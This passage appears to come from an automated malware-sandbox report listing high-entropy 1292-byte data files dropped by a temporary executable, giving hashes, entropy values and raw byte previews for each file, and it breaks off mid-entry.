                                                                                            Preview:.hom.c1......;..2). .].X...D...t...qR.l..3.o6<*i*.V.<...MQ...`..............qC. .....SJ.....E...@....p9..r. ......e..Z.....e.Y.2.9.S....|w/.B5..\.w......*..)tTIJf7.M...~#...R...w.K*A..d(4i..@K1sN)J...V..t...+..&.w..dCy.%..?..tT...cJ.5|xG......F5..P....fE....k..Z..I....8..oaKb.s.....{.:<q[-+ke.8i....T&.....b.......(...j....U.k.....X.M5.l...T..g....#.'q.@..;.4..'z..!M...y.b..J._bz.k.... ..y.70$el(U....?....V.jK..]G<h..8..7...H.D....v.e...{n?..u...Y.d....4bb..y.DY8....b ....J.*:;u....L(..\.qmZ.H..d.N?....6D .U....Lt.cz.b..@...P.......L...`..9:`.x..J7."j..}..-...:......O..^NxJ..o..=.}.?kb../j>..{..;...3M...`}..$.......*.+...Q.J.`{.s....o..$.|...zh.$:..N..3..W...lgk......N|.....0..=.}..f.h....&...&....4/..6M.Z".Y@%.A3...d;..{...3..Y.8.|+..X...'[..}....b...@..g......._....`u....9......A...= .q@'...p`^Ndh....3...,R#Q{.9k........2...n.q.b...%.5.`...-..-G1.K.=.r?......u.X[,Y1!.H.7........$D...w....1+....9...i..E.....=..t....?.}..|...F..X....x..r...z.c...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.846090092098478
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:F2aPHHMj3VxV34EAUldlP0Qa0rFR8I408uEawfrOhTYb7Xw0ZoX31Y4Src7:FvnMRxFXldlM2FR8xuENS331co
                                                                                            MD5:D9A21D74C8F9AB4A4DF3056059772482
                                                                                            SHA1:742D151E61E3E2DFBC6734C568FC037ED327E0A5
                                                                                            SHA-256:5487C7958B8B741E9224978BCCDD390C4EA07F30997B2A11D0B3602D6D61510C
                                                                                            SHA-512:274CE1CB62B7C134E6C6CA4FDDB06140F82E306D3D2879F503979885AE2EC9CA1EE975C0BFCFA08CFC5633AD15F686F137B4FADEF6168BD27154EFC9EFC332DB
                                                                                            Malicious:false
                                                                                            Preview:.hom.c1......;..2). .].X...D...t...qR.l..3.o6<*i*.V.<...MQ...`..............qC. .....SJ.....E...@....p9..r. ......e..Z.....e.Y.2.9.S....|w/.B5..\.w......*..)tTIJf7.M...~#...R...w.K*A..d(4i..@K1sN)J...V..t...+..&.w..dCy.%..?..tT...cJ.5|xG......F5..P....fE....k..Z..I....8..oaKb.s.....{.:<q[-+ke.8i....T&.....b.......(...j....U.k.....X.M5.l...T..g....#.'q.@..;.4..'z..!M...y.b..J._bz.k.... ..y.70$el(U....?....V.jK..]G<h..8..7...H.D....v.e...{n?..u...Y.d....4bb..y.DY8....b ....J.*:;u....L(..\.qmZ.H..d.N?....6D .U....Lt.cz.b..@...P.......L...`..9:`.x..J7."j..}..-...:......O..^NxJ..o..=.}.?kb../j>..{..;...3M...`}..$.......*.+...Q.J.`{.s....o..$.|...zh.$:..N..3..W...lgk......N|.....0..=.}..f.h....&...&....4/..6M.Z".Y@%.A3...d;..{...3..Y.8.|+..X...'[..}....b...@..g......._....`u....9......A...= .q@'...p`^Ndh....3...,R#Q{.9k........2...n.q.b...%.5.`...-..-G1.K.=.r?......u.X[,Y1!.H.7........$D...w....1+....9...i..E.....=..t....?.}..|...F..X....x..r...z.c...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.830487993270538
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:xr+2U3/fiklRCZaTQ4/+PkzzCFbx3dCirP7WyYI8aEnhxERgRnlD:x+N3/fDWaOMzzCFbx3d1sI8x9RnlD
                                                                                            MD5:2AD1DFA5D667E31EC85F24B193D89D85
                                                                                            SHA1:CAE5904F094ED493613A19185758BCB585E45AE8
                                                                                            SHA-256:72992624555AAD01BDFE8A2D723CACD7B8F6E408CFC22006C3E58BA93A499CEC
                                                                                            SHA-512:BAFD0564A98238208DF929A430D2A1D1B0CECC54F0C22110421BA878BD7B511EF5C2569E18120611B757B804097C776B1589A0A10030F8D11CCD625D453B75D4
                                                                                            Malicious:false
                                                                                            Preview:.B]..E.L....>....5....kz-.....~.]C.....Z..xp........m.....D.1%.R.v..y.e\..j.........,.y..;..f...I......Z......dPX.E.+.1g..KS,..hP..r....F....{.....*TB.>6...8H.."/!`.G...BX!..W......K......<.H<5..(d...1}.m.h.bh.e..B%AP..>S+.R`...l!.S.........c~..........K..Z!.../"..m..e=.R..P..)q.z...|@..q.9..<...Z .c^.G....6..Y.`.P....dqE..m.U^.j.)...^....]..X. >.^.R......".G$.~.y3g....H.....h*.....c....OSL{)..p...Y.K....bJ...Zf.g....*.E..)|!`s.q)};...}$.Te|.-E..C.%dX.:.....K...Ed....%..7B..tj.>r.@.i...H~......./..}'Gu.1{.8...`E...... .Lwkc.....E!.j..`...2...U....6.........}N.bd...X...?(.rI..&.@....'..9".+`..b."9..&.%..{..n;......t.^...2.*fM?... .G..........MQe..?g7.[*.Q.e..c/.6$.Hmy...E 1..1.........h.M{.O.4.yq..?.S.FJ..v..gU-.J.....k...Q}...(U.BS<..D..F.s.4ud..@..4...v..<.K#.. f.Q..}....^..\..s......7.NV..~..\>....j..F<..9.!..|I.i.x..?.Li..6..N....8$..~.."dBRQyZ".....[.F.a.j......rj5...c.H.B.e.I...&d.....D...&....'<......T.7.-.~.-+....<..'.|W........8=.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.830487993270538
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:xr+2U3/fiklRCZaTQ4/+PkzzCFbx3dCirP7WyYI8aEnhxERgRnlD:x+N3/fDWaOMzzCFbx3d1sI8x9RnlD
                                                                                            MD5:2AD1DFA5D667E31EC85F24B193D89D85
                                                                                            SHA1:CAE5904F094ED493613A19185758BCB585E45AE8
                                                                                            SHA-256:72992624555AAD01BDFE8A2D723CACD7B8F6E408CFC22006C3E58BA93A499CEC
                                                                                            SHA-512:BAFD0564A98238208DF929A430D2A1D1B0CECC54F0C22110421BA878BD7B511EF5C2569E18120611B757B804097C776B1589A0A10030F8D11CCD625D453B75D4
                                                                                            Malicious:false
                                                                                            Preview:.B]..E.L....>....5....kz-.....~.]C.....Z..xp........m.....D.1%.R.v..y.e\..j.........,.y..;..f...I......Z......dPX.E.+.1g..KS,..hP..r....F....{.....*TB.>6...8H.."/!`.G...BX!..W......K......<.H<5..(d...1}.m.h.bh.e..B%AP..>S+.R`...l!.S.........c~..........K..Z!.../"..m..e=.R..P..)q.z...|@..q.9..<...Z .c^.G....6..Y.`.P....dqE..m.U^.j.)...^....]..X. >.^.R......".G$.~.y3g....H.....h*.....c....OSL{)..p...Y.K....bJ...Zf.g....*.E..)|!`s.q)};...}$.Te|.-E..C.%dX.:.....K...Ed....%..7B..tj.>r.@.i...H~......./..}'Gu.1{.8...`E...... .Lwkc.....E!.j..`...2...U....6.........}N.bd...X...?(.rI..&.@....'..9".+`..b."9..&.%..{..n;......t.^...2.*fM?... .G..........MQe..?g7.[*.Q.e..c/.6$.Hmy...E 1..1.........h.M{.O.4.yq..?.S.FJ..v..gU-.J.....k...Q}...(U.BS<..D..F.s.4ud..@..4...v..<.K#.. f.Q..}....^..\..s......7.NV..~..\>....j..F<..9.!..|I.i.x..?.Li..6..N....8$..~.."dBRQyZ".....[.F.a.j......rj5...c.H.B.e.I...&d.....D...&....'<......T.7.-.~.-+....<..'.|W........8=.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.852185244970812
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:BuetLGfp6kr8oSdJj+hQ/qGEwEBldDKxhnGgO/ea7MwJWkX7nXTKXhElq84iDHh/:setAb8oSdJj+hOpyOxhrO/jM8bXTUuKq
                                                                                            MD5:5C1F38AE0AC570748326B39D0C1208BE
                                                                                            SHA1:02C3849123A71E0EE75AA0A451038EFE32058722
                                                                                            SHA-256:68C7AB1ACE500C71C5DD365DD42EB7FACDB43292B09FFDB1CF436B4FC6C9A5C3
                                                                                            SHA-512:546E1A12801BBDAE81D2CC318CE57956B07E71224B09D0D41A022B80B262A0722CEA4B200424C21626531D415CB65C38A066E3B7BB9C06D04607FA841BCBB5A1
                                                                                            Malicious:false
                                                                                            Preview:..w.V....&.....D.....F.9....u.&...........Waw.9o......(y...U.YorshK.l...N..+..`.o..B..MT...E?.I..y..J.)..lmK.T...].8/.....Lo_.g..c5....r...y!.f.ms.-...F.BX....,m.......7.!b^l..0.H.1.3.y.E,[[._R.Rl..Y....O^....A......C..u...(^..C(M._qc.q.".......'.9....n..:..l.N..T.4.}..S{.:..~.$d.~.3A..o.[~.._.K .......r..$^..d;......]'8.7$...}V.|...).9...H....5...^...._..u..p.+S)....sh....X.jr.F....zF....L......Rrkf...^.l..|..3..:.!..L..@w..o]..V\&......w..k.YS>RTU.=U8.@.B?.Y...I9.......$.....T...MZ~&g-O][lJ.5.km.....2x...b|.G.:.....:[Vi.............z...}.|..G.B?.3k4.U&.6....Kn.>.O.#h.....=..X87..hw....I..lP.o>.=,...z...h.....^.H.f.b.i./..G............v...<. ?6~..u..&>`.....w.zl.....o(..L=e....m..h!G.+H`.6..j...7g..4}.gx.............i"....F...L~.<O.#.r.y}.....{.^S8....O.....zT.k..6.PYB3.DV4&....G.V_.>}V.Hj.O..s..,.7....7..].*."...sH.j.76"H..=df.........[.q.G.....vM...l^....UG{..Tg"q.....3WL>/u....E..T'm~..D......kN...*...D7.....'9LP.x...T.nRn...,.#.C.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.852185244970812
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:BuetLGfp6kr8oSdJj+hQ/qGEwEBldDKxhnGgO/ea7MwJWkX7nXTKXhElq84iDHh/:setAb8oSdJj+hOpyOxhrO/jM8bXTUuKq
                                                                                            MD5:5C1F38AE0AC570748326B39D0C1208BE
                                                                                            SHA1:02C3849123A71E0EE75AA0A451038EFE32058722
                                                                                            SHA-256:68C7AB1ACE500C71C5DD365DD42EB7FACDB43292B09FFDB1CF436B4FC6C9A5C3
                                                                                            SHA-512:546E1A12801BBDAE81D2CC318CE57956B07E71224B09D0D41A022B80B262A0722CEA4B200424C21626531D415CB65C38A066E3B7BB9C06D04607FA841BCBB5A1
                                                                                            Malicious:false
                                                                                            Preview:..w.V....&.....D.....F.9....u.&...........Waw.9o......(y...U.YorshK.l...N..+..`.o..B..MT...E?.I..y..J.)..lmK.T...].8/.....Lo_.g..c5....r...y!.f.ms.-...F.BX....,m.......7.!b^l..0.H.1.3.y.E,[[._R.Rl..Y....O^....A......C..u...(^..C(M._qc.q.".......'.9....n..:..l.N..T.4.}..S{.:..~.$d.~.3A..o.[~.._.K .......r..$^..d;......]'8.7$...}V.|...).9...H....5...^...._..u..p.+S)....sh....X.jr.F....zF....L......Rrkf...^.l..|..3..:.!..L..@w..o]..V\&......w..k.YS>RTU.=U8.@.B?.Y...I9.......$.....T...MZ~&g-O][lJ.5.km.....2x...b|.G.:.....:[Vi.............z...}.|..G.B?.3k4.U&.6....Kn.>.O.#h.....=..X87..hw....I..lP.o>.=,...z...h.....^.H.f.b.i./..G............v...<. ?6~..u..&>`.....w.zl.....o(..L=e....m..h!G.+H`.6..j...7g..4}.gx.............i"....F...L~.<O.#.r.y}.....{.^S8....O.....zT.k..6.PYB3.DV4&....G.V_.>}V.Hj.O..s..,.7....7..].*."...sH.j.76"H..=df.........[.q.G.....vM...l^....UG{..Tg"q.....3WL>/u....E..T'm~..D......kN...*...D7.....'9LP.x...T.nRn...,.#.C.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.856258509639552
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:4sC4h+b/YfD/WZKbIup0P/TRo3zRKYU2GCccNCyIPKYU6gMagRG3KBZj:4Uh+qDjbrpa/T8FKYeCxC9JVgxWl
                                                                                            MD5:228381E628B62A8DAC627F8CD69D4B28
                                                                                            SHA1:B81583B622F6AF8933D775EFF229BECA7991DC12
                                                                                            SHA-256:4A11B86A62DE056D85741161163378204A0178CE628F6CD618805B7AB68957DD
                                                                                            SHA-512:8E181C91305B4BD11DC33F3923AD8026FA1EEAC9E03F07BF1C670B304EAE4A9F481AC18D89DB4EDA6EDE6783677AECA27E5B27F2C9AD5612DF613ACF5B29EB10
                                                                                            Malicious:false
                                                                                            Preview:U.~/....gM.K..{.............4.~.]..u....$...C.GH.]^W..v$...=..c.P.H>.\..U...p.i...5..l...$~.rq..B,..<,.~. ...*7.XFB$B{.....\.m.]^Z.8...5.x2......[.&.`...{.....&.v.K....X.f...L....9.....7W@..N.:-!U.[..aIM..6R...>.4....b1=-kNz.+._...>`...y.g.6..f..[.%}p...|....MH9@j." ..D.T...";Hl6..P....8.|fj..`....._.ve.......u...........i..p..Z.&.../...cFg?.).........".o..R.../D(@[V....|...?9}..)..M....:.aZ....../..._ <.O.^.<NG.......?~2#*.L..1..H.Rm.=...x...N...%}[q...{...O........u....V.J....Q....e>...,C.....e|.b.=%H..1m.......[8{&Pg.%..%o.{.5jx.....f.P..BH....H.e4.R... ..!X2.9..K..p[.SIo.=.9......t._..u..%w.vy.;o...6.5.!_...,Y.../...P....'*..[.`.......6........N.D.Q ..t^...Edk..C`...o}...E...qP...kG...3t...O.V...=r....M.6S..?.n..u".U..,......'g.....h......d\.%.....,.D~!.;.. a.#....\.~/.@g3.......'..M.1.v..T..Tv.h....m.a...IW.....;....Oi.u..d)....>..o..6..x=....`Zb...-:7UH....N... ..l.4$..Z.....4$.......$;f..|6C?.(..g.x...^^.L.:...cf.x....-`j..n.q,(I...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.856258509639552
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:4sC4h+b/YfD/WZKbIup0P/TRo3zRKYU2GCccNCyIPKYU6gMagRG3KBZj:4Uh+qDjbrpa/T8FKYeCxC9JVgxWl
                                                                                            MD5:228381E628B62A8DAC627F8CD69D4B28
                                                                                            SHA1:B81583B622F6AF8933D775EFF229BECA7991DC12
                                                                                            SHA-256:4A11B86A62DE056D85741161163378204A0178CE628F6CD618805B7AB68957DD
                                                                                            SHA-512:8E181C91305B4BD11DC33F3923AD8026FA1EEAC9E03F07BF1C670B304EAE4A9F481AC18D89DB4EDA6EDE6783677AECA27E5B27F2C9AD5612DF613ACF5B29EB10
                                                                                            Malicious:false
                                                                                            Preview:U.~/....gM.K..{.............4.~.]..u....$...C.GH.]^W..v$...=..c.P.H>.\..U...p.i...5..l...$~.rq..B,..<,.~. ...*7.XFB$B{.....\.m.]^Z.8...5.x2......[.&.`...{.....&.v.K....X.f...L....9.....7W@..N.:-!U.[..aIM..6R...>.4....b1=-kNz.+._...>`...y.g.6..f..[.%}p...|....MH9@j." ..D.T...";Hl6..P....8.|fj..`....._.ve.......u...........i..p..Z.&.../...cFg?.).........".o..R.../D(@[V....|...?9}..)..M....:.aZ....../..._ <.O.^.<NG.......?~2#*.L..1..H.Rm.=...x...N...%}[q...{...O........u....V.J....Q....e>...,C.....e|.b.=%H..1m.......[8{&Pg.%..%o.{.5jx.....f.P..BH....H.e4.R... ..!X2.9..K..p[.SIo.=.9......t._..u..%w.vy.;o...6.5.!_...,Y.../...P....'*..[.`.......6........N.D.Q ..t^...Edk..C`...o}...E...qP...kG...3t...O.V...=r....M.6S..?.n..u".U..,......'g.....h......d\.%.....,.D~!.;.. a.#....\.~/.@g3.......'..M.1.v..T..Tv.h....m.a...IW.....;....Oi.u..d)....>..o..6..x=....`Zb...-:7UH....N... ..l.4$..Z.....4$.......$;f..|6C?.(..g.x...^^.L.:...cf.x....-`j..n.q,(I...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.841532529834301
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:BJ6YYwVq4Uj4bLdX8+dLwZE9/lPGlOilsobTOFhjCFrHm1PHTu0YxjGzCpe:BJ6YO4WuL+E9dPzYyF1ClGFa7jKCM
                                                                                            MD5:CEA8F0083BB6C6F9CC89D7F7AD17FBEE
                                                                                            SHA1:EEC9C93B5CE9CF6C6DE87F17CA5A80F8E50B6010
                                                                                            SHA-256:D5981D6379BF59F4871931593F48A29FCABC0EF18124CA6DCB8FAA0EA6711E08
                                                                                            SHA-512:EB8F0F3478B58884AB970BE07B8A2AEDC568D94C5C71AF61A819167D6E0D4D6EFEC0838495F9DB6791940B2E7DD47A38B23A917C2667E77E67A491942C9A0573
                                                                                            Malicious:false
                                                                                            Preview:e'..o.t{."i.n.1...E.-....../...}......7.......>2%tk....o1-. ..Y...e..,.]..DPl.R....B...{.....F..qp..V:."...#.1+.y.K}.....U.G..,...L..r;...v5]D.....dz.....?..c@%l..}.*,...@..x...Vx...Kou.1..$r..n.P....Gd>H`.P..:...(..+e.\.)...d..".U.9.TM..9.@..;..a"....$Z...2n.Q....*.).j....."...&S]`.R.U.!..;JU.0.O.{!.o.!.y.h...."2...SU^.?B.Jv.h).O....B$.a.J....$....*..Li._L.M..?...(..Y=UJ1.&#!J.......#..O9jC!...../B*^K.#.X..L.&&.....i.()4.^....~..4..Q.Q%..:.?.Z.....;jRG..hm*....1......4.iD.{.W..uVK....t?6M.)..Le....4.../%p;..s._2..&X...0......Fc.r.7...;.tE...ys<.2.....0MWk.[...6..u..N5}'...<l........$k.!......TW.2....Ts..,...b..GA(R.fm.L...o(}..v5....|lni..?.2SW.(^...b.....+`b....).X<V..V....(....+D.l...h....a....od....G..*dk*.......[..&O..Bi...._...**..!:.A....T..N&.P.....\.Y8R....H2}|....P.V.a.+<..Q....x.....1MvO."T.M..V.EEm.....b.c.f...Y.1.Hm:...6.(.T...z..B2....P(.#.jD.+.%.=.y{....#. ..Svs.....d....7....ZI.0..s.Q'p..d4.]w.8....y._....].1./DvO.,5..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.841532529834301
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:BJ6YYwVq4Uj4bLdX8+dLwZE9/lPGlOilsobTOFhjCFrHm1PHTu0YxjGzCpe:BJ6YO4WuL+E9dPzYyF1ClGFa7jKCM
                                                                                            MD5:CEA8F0083BB6C6F9CC89D7F7AD17FBEE
                                                                                            SHA1:EEC9C93B5CE9CF6C6DE87F17CA5A80F8E50B6010
                                                                                            SHA-256:D5981D6379BF59F4871931593F48A29FCABC0EF18124CA6DCB8FAA0EA6711E08
                                                                                            SHA-512:EB8F0F3478B58884AB970BE07B8A2AEDC568D94C5C71AF61A819167D6E0D4D6EFEC0838495F9DB6791940B2E7DD47A38B23A917C2667E77E67A491942C9A0573
                                                                                            Malicious:false
                                                                                            Preview:e'..o.t{."i.n.1...E.-....../...}......7.......>2%tk....o1-. ..Y...e..,.]..DPl.R....B...{.....F..qp..V:."...#.1+.y.K}.....U.G..,...L..r;...v5]D.....dz.....?..c@%l..}.*,...@..x...Vx...Kou.1..$r..n.P....Gd>H`.P..:...(..+e.\.)...d..".U.9.TM..9.@..;..a"....$Z...2n.Q....*.).j....."...&S]`.R.U.!..;JU.0.O.{!.o.!.y.h...."2...SU^.?B.Jv.h).O....B$.a.J....$....*..Li._L.M..?...(..Y=UJ1.&#!J.......#..O9jC!...../B*^K.#.X..L.&&.....i.()4.^....~..4..Q.Q%..:.?.Z.....;jRG..hm*....1......4.iD.{.W..uVK....t?6M.)..Le....4.../%p;..s._2..&X...0......Fc.r.7...;.tE...ys<.2.....0MWk.[...6..u..N5}'...<l........$k.!......TW.2....Ts..,...b..GA(R.fm.L...o(}..v5....|lni..?.2SW.(^...b.....+`b....).X<V..V....(....+D.l...h....a....od....G..*dk*.......[..&O..Bi...._...**..!:.A....T..N&.P.....\.Y8R....H2}|....P.V.a.+<..Q....x.....1MvO."T.M..V.EEm.....b.c.f...Y.1.Hm:...6.(.T...z..B2....P(.#.jD.+.%.=.y{....#. ..Svs.....d....7....ZI.0..s.Q'p..d4.]w.8....y._....].1./DvO.,5..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.872738807427542
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:036wmeSeMc//Ku8NcpGEUZtTnT4MLxdv9VKQmyYJsjHSu10GhW1O:032eV6mgZlT3Lxd3bb5jHS4rhwO
                                                                                            MD5:3892260F49A063D6648317172FB7549A
                                                                                            SHA1:A95369BFEA8DBC2FCF9E85F1B84A2232FC31955D
                                                                                            SHA-256:38CAA1200681878D00C11962838255984D4299430A56635C41B1700685386051
                                                                                            SHA-512:64550916359A01983B55587D94267C085212145981A5012C00BF8E90813A1AED9562D1272AF5E3BA4A16839B283CA052C40B635D479E44CFCEC2193FA2DBCA62
                                                                                            Malicious:false
                                                                                            Preview:.HI..&.5Gb.Q.y.....g...R)W...H].;..d.l..."...N'...4...L..T......%.x...;..Mn.(.N...4...NK.....T.PGL..p...Tc.Q....P."......fiH..$......&.|....g.....P..(..X........[Rx.<."$.,.X.v....W....I.d.@BS..m..#.D.-..........&.....?.z.zu....b..}[7...Y+..B*...3`.GS..db9.po....(t...dA..e.."../..K.B.A...4.0. .:J...kC..]KcW...N{...V.k..J-{.?..m%i..s..s....2C..S..b..W.."%=4..WdK.`.-R.'.)8.H-x.i.P..G.Ks..#...:..4.:...zf>(2...-.'...~?P....p*...[n..EM..........r[...../.N`F.D..}h.......T.....T....3.O...k..7.?....Z..l.d..u..w...tC.<a..6.$..3....;L.Z......[.q..Q..;....tk..E.9.w...?......`Km..6..h.4.$Wi.......Z.AB._.............N7y.I.....kh.bQ}..H...R..h6wgs.g...B..\i..v]..I.;.3...B..1.^....ULQ(.Gw..&m...Ww!Xh.).M...t........;.c..n.t.h.3J.......^/,Q.R.}.a...McI.6.#RDp.F.}h...By./x..s..G..nt...gm....jDjxM.. .5g..ost@%.c...R.$..=.X..'.......i..Yd.M+.......>*.$$5#........fd8.q......$H.'....1ND..50.....q.t..tK....c....9.L.. .PG0.l6Y.~.}4..R.......^X.....4..Y.7.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.872738807427542
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:036wmeSeMc//Ku8NcpGEUZtTnT4MLxdv9VKQmyYJsjHSu10GhW1O:032eV6mgZlT3Lxd3bb5jHS4rhwO
                                                                                            MD5:3892260F49A063D6648317172FB7549A
                                                                                            SHA1:A95369BFEA8DBC2FCF9E85F1B84A2232FC31955D
                                                                                            SHA-256:38CAA1200681878D00C11962838255984D4299430A56635C41B1700685386051
                                                                                            SHA-512:64550916359A01983B55587D94267C085212145981A5012C00BF8E90813A1AED9562D1272AF5E3BA4A16839B283CA052C40B635D479E44CFCEC2193FA2DBCA62
                                                                                            Malicious:false
                                                                                            Preview:.HI..&.5Gb.Q.y.....g...R)W...H].;..d.l..."...N'...4...L..T......%.x...;..Mn.(.N...4...NK.....T.PGL..p...Tc.Q....P."......fiH..$......&.|....g.....P..(..X........[Rx.<."$.,.X.v....W....I.d.@BS..m..#.D.-..........&.....?.z.zu....b..}[7...Y+..B*...3`.GS..db9.po....(t...dA..e.."../..K.B.A...4.0. .:J...kC..]KcW...N{...V.k..J-{.?..m%i..s..s....2C..S..b..W.."%=4..WdK.`.-R.'.)8.H-x.i.P..G.Ks..#...:..4.:...zf>(2...-.'...~?P....p*...[n..EM..........r[...../.N`F.D..}h.......T.....T....3.O...k..7.?....Z..l.d..u..w...tC.<a..6.$..3....;L.Z......[.q..Q..;....tk..E.9.w...?......`Km..6..h.4.$Wi.......Z.AB._.............N7y.I.....kh.bQ}..H...R..h6wgs.g...B..\i..v]..I.;.3...B..1.^....ULQ(.Gw..&m...Ww!Xh.).M...t........;.c..n.t.h.3J.......^/,Q.R.}.a...McI.6.#RDp.F.}h...By./x..s..G..nt...gm....jDjxM.. .5g..ost@%.c...R.$..=.X..'.......i..Yd.M+.......>*.$$5#........fd8.q......$H.'....1ND..50.....q.t..tK....c....9.L.. .PG0.l6Y.~.}4..R.......^X.....4..Y.7.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.871622542342082
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:iHyrbirirbM6ZWul08b6KwASJqSRFGqSijMPWM5IbYji0EnPW0zWnH:vrCybM6X6KcuAuPyD0cPWt
                                                                                            MD5:4413E3C9AD7093700CC8798BFEBE7DF8
                                                                                            SHA1:7FBAA40C11463C414932018939A97FD69208AB04
                                                                                            SHA-256:09F65B86F867AD5F29D2084C0A24C4862A84C5B497244F1C4FE6E1AD7E83EDB0
                                                                                            SHA-512:5F88EAA7C83479F9B7004D025BA36F053968BE54C0B2B3DB02F64B3B58B02B9B38B881188363994C7AD56DD67790F72544BFE6D1CA15C6B2FE8952FEA5331EFE
                                                                                            Malicious:false
                                                                                            Preview:.<o.G.c..u...C/K..+f.o_a.xj..w.;...Q.5.C....... ....wd..0f5q"2^....g!A..:......~.,....l,.>x.....`..>........5..!....,}e....^[)/.|..d...-V..E..I..W..........y....v../t+.W....L....FY-N...0.llX}Y..*A.Y"h[1..I.a.3..'..2....d..../..G.F]}. .....}c........=...|..I..p.....0.p..!.a..y..p.i.y..Z.'[Q.w.9..M.....x.....!...Y..:.%.K..t...gJ.....)Z ......G*..........v......G..R..p.F.^..X|../C......D..\.S.|-js.dM.E?.t-...t./g. \4.@f.^..M.T..u.....Yh&.W~.|.....e[.P..B.....V.....h.......Y.....w..}D..q.......<...3lu@WMj..Y.:.............{E.q9.fF...8k..`...^7q..4....<..%.}"c.t$...1tkT...yn5..p.$.....R.M.6....+....ZJ.(..m..dTr9,f.Uz.$.P......4rU.3.Q.r.fr.....-.30....D.a9....SQ....Y7.].PL..E..{9J.+!...e.&...d.g*..6B.c..........p9M..$.v.Y_(..f#.6.Q._C......tP.%b.C...y9.*....?Q.L.`....X.vw<..,...U.........+<R6-....P.5&".SU.....n`.3..(.{.6.z:.l....Y...J..]../.^...y..U.v....l.u{.cG>.Li...z'rl..Q)3.M.@.O.(..tx.hSf......G.2.,.....6....+..N.|$...X.D2....d..J
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.871622542342082
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:iHyrbirirbM6ZWul08b6KwASJqSRFGqSijMPWM5IbYji0EnPW0zWnH:vrCybM6X6KcuAuPyD0cPWt
                                                                                            MD5:4413E3C9AD7093700CC8798BFEBE7DF8
                                                                                            SHA1:7FBAA40C11463C414932018939A97FD69208AB04
                                                                                            SHA-256:09F65B86F867AD5F29D2084C0A24C4862A84C5B497244F1C4FE6E1AD7E83EDB0
                                                                                            SHA-512:5F88EAA7C83479F9B7004D025BA36F053968BE54C0B2B3DB02F64B3B58B02B9B38B881188363994C7AD56DD67790F72544BFE6D1CA15C6B2FE8952FEA5331EFE
                                                                                            Malicious:false
                                                                                            Preview:.<o.G.c..u...C/K..+f.o_a.xj..w.;...Q.5.C....... ....wd..0f5q"2^....g!A..:......~.,....l,.>x.....`..>........5..!....,}e....^[)/.|..d...-V..E..I..W..........y....v../t+.W....L....FY-N...0.llX}Y..*A.Y"h[1..I.a.3..'..2....d..../..G.F]}. .....}c........=...|..I..p.....0.p..!.a..y..p.i.y..Z.'[Q.w.9..M.....x.....!...Y..:.%.K..t...gJ.....)Z ......G*..........v......G..R..p.F.^..X|../C......D..\.S.|-js.dM.E?.t-...t./g. \4.@f.^..M.T..u.....Yh&.W~.|.....e[.P..B.....V.....h.......Y.....w..}D..q.......<...3lu@WMj..Y.:.............{E.q9.fF...8k..`...^7q..4....<..%.}"c.t$...1tkT...yn5..p.$.....R.M.6....+....ZJ.(..m..dTr9,f.Uz.$.P......4rU.3.Q.r.fr.....-.30....D.a9....SQ....Y7.].PL..E..{9J.+!...e.&...d.g*..6B.c..........p9M..$.v.Y_(..f#.6.Q._C......tP.%b.C...y9.*....?Q.L.`....X.vw<..,...U.........+<R6-....P.5&".SU.....n`.3..(.{.6.z:.l....Y...J..]../.^...y..U.v....l.u{.cG>.Li...z'rl..Q)3.M.@.O.(..tx.hSf......G.2.,.....6....+..N.|$...X.D2....d..J
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
